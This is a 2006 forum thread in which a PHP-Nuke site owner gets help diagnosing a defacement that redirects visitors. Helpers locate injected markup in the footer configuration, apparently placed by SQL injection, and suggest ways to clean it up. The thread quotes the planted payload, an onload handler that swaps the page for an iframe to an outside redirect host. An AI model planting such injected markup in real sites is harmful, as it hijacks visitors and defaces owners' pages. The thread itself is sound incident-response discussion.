Hacked Site. [Solved]

Posted: Sun Jan 15, 2006 11:36 pm

Raven, Long time since I have stopped by. Good to see the site thriving.

I have been hacked and would like any help that anyone can afford. I have been out of the Nuke loop for so long my technical know-how leaves something to be desired; so I have to give a layman's discription of what is going on. Hopefully someone will recognize the variant of attack and offer advice.

Descripton: To me it appears to be some type of redirect hack. When you enter my web address my site will start to load. You can even see the site loading briefly before the browser screen turns into a page that simply says "Hacked?" in large letters in the middle of the screen. If you type in my web address but use moduels.php, admin.php, or any other besides index.php, the result is the same. I am able to hit the browser's stop button before the malicious page pops up. When doing so, it will stop the loading of the page and I can see my site. It appears that nothing in the site has been altered i.e. deleted, added, etc. However, I cannot log in as an admin . Not because the name or password has been changed, but because I am unable to stop the page at precisely the right time so i can see the security numbers so that I can enter them. (The redirect happens too fast)

I logged in to my adminstration Deck so I could take a peek behind the scenes. Again, I can see nothing SIMPLE that has been altered, such as a new user. I did take a peek at the logs but I don't know what I'm looking for. The good thing is that my logs for each day are very small because my site gets very little traffic.

My best uneducated guess is that they did some type of SQL injection. I don't think they hacked my password and altered things that way.

I am also running a sub-domain which has not been affected and to the best of my knowledge is unaltered. My goal here is to simply restore mormalcy to my main domain site. Once I have got that I will probably take it down and rebuild it with something besides Nuke. Not because I don't like Nuke but simply because my hosting service does not provide me the ability to update it (I tried in the past but was unsuccessful). The version I am running on my main domain is older and therefore I am sure has tons of vulnerabilities. My sub domain I have kept up on updates.

The website link is below. Hopefully my description, and a look for yourself, will be enough for someone to point me in the right direction so I can clean it up and move on. Sorry for not being able to provide more technical desciptors. Like I said, I have been out of the loop for a while and have probably forgotten 70% of what I used to know.

Thanks,
18-delta
Only registered users can see links on this board! Get registered or login!

registered · Posted: Mon Jan 16, 2006 1:10 am

Hmm sorry, I don't see anyting in that link. Only the webpage index

Posted: Mon Jan 16, 2006 1:24 am

I am messing with it now. Yeah I'm lost...... Please disregard until I can give you guys something more specific.

At this point all I can say is that the Index.php in my default directory which points to the installed Nuke has been removed by me. Therefore one can not see the problem I described above at this time. If you wish to take a look here is the link:

http://ibryson.com/ipw-web/portal/cms/index.php

I am trying to track it all down.

thanks for taking a look evaders99.

registered · Posted: Mon Jan 16, 2006 1:32 am

Try: http://ibryson.com/ipw-web/portal/cms/ Wink

Posted: Mon Jan 16, 2006 1:37 am

Hrm... Interesting...

Looks like there's redirect in your CSS file to http://redirect1.sitemynet.com/

Posted: Mon Jan 16, 2006 1:47 am

More clues...

Disabling Javascript brings up your site just fine!

Posted: Mon Jan 16, 2006 1:52 am

OK....???... somebody hacked the css file for the default theme i have for the site?

If so, is this a theme vulnarability or am I looking at a whole nother monster?

Posted: Mon Jan 16, 2006 1:57 am

Aha! Bogies at the bottom of your index file...

Code:

<body topmargin=0 leftmargin=0 onload="document.body.innerHTML='<iframe width=100% height=100% src=http://redirect1.sitemynet.com/></iframe>';">


<body topmargin=0 leftmargin=0 onload="document.body.innerHTML='<iframe width=100% height=100% src=http://redirect1.sitemynet.com/></iframe>';">


<body topmargin=0 leftmargin=0 onload="document.body.innerHTML='<iframe width=100% height=100% src=http://redirect1.sitemynet.com/></iframe>';">

Posted: Mon Jan 16, 2006 2:00 am

18-delta wrote:

OK....???... somebody hacked the css file for the default theme i have for the site?

If so, is this a theme vulnarability or am I looking at a whole nother monster?

Hard to say, but I think the first place I would look is inside my footer code... Wink

Posted: Mon Jan 16, 2006 2:05 am

ok, thanks VIN. Not to sure what I'm looking for but i will keep searching through the files.

One mess at a time LOL.

Posted: Mon Jan 16, 2006 2:08 am

Heh! Happy hunting!

Posted: Mon Jan 16, 2006 2:12 am

Vin. Where did you pull that code from? I threw my index file into an editor and don't see it anywhere?

Posted: Mon Jan 16, 2006 2:13 am

Here's another clue for you... check out the footer on this site:

http://www.amarivinciscordia.info/

Looks like a failed attempt... ROTFL

Posted: Mon Jan 16, 2006 2:15 am

18-delta wrote:

Vin. Where did you pull that code from? I threw my index file into an editor and don't see it anywhere?

How does your (root) 'footer.php' file look? I think I'd check that first...

Posted: Mon Jan 16, 2006 2:23 am

Pff what a waste of time.

1. Download and install FireFox
2. Install Only registered users can see links on this board! Get registered or login!
3. Disable JavaScript thru webdeveloper
4. Admin -> Settings

Or just run the following query

Code:

UPDATE nuke_config SET footer1='';

Posted: Mon Jan 16, 2006 2:25 am

djmaze wrote:

Pff what a waste of time...

Come on, Cowboy, this is fun! Smile

Quote:

“Give a man a fish; you have fed him for today. Teach a man to fish; and you have fed him for a lifetime.”

Posted: Mon Jan 16, 2006 2:31 am

My root footer looks fine.

already use firefox, and disabled javascript.

Posted: Mon Jan 16, 2006 2:37 am

Probably a SQL injection then...

I think I'd check my `nuke_config` table next. See how your foot fields look, e.g. 'foot1', 'foot2', 'foot3', et cetera...

Posted: Mon Jan 16, 2006 3:03 am

Oh, BTW... http://www.zone-h.org/en/defacements/view/id=3220258/

Posted: Mon Jan 16, 2006 3:04 am

found it in foot1.

man.....

So do i just dump the data out of foot1?

I dont know what the original had in it.

More importantly, how can I avoid an injection like this inthe future?

Thanks in advance Vin.

I am heading off to bed and will check back in the morning.

Posted: Mon Jan 16, 2006 3:18 am

18-delta wrote:

found it in foot1. man... So do i just dump the data out of foot1?

Cool!

Well, all that is, as the name implies, is the first line in your footer message. Mine is, like, 'Copyright 1996-2005 Lenon.com All rights reserved', or whatever...

As far as protecting yourself in the future -- I don't know how this Turkish hacker injected the code. What I would so is go through my logs, line-by-line and see how he did it -- then, close the loophole.

Anyway, glad to see you found the problem!

Latez!

Posted: Mon Jan 16, 2006 3:22 am

Cool. thanks man!!

I will scour the logs and post anything I find.

Sincerely, thanks for your time.

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

This hack is usually accomplished by them adding an admin to your authors table and possibly a user record too. Be sure to check that out. If you find that is the case, NukeSentinel(tm) easily stops that. Are you using NS?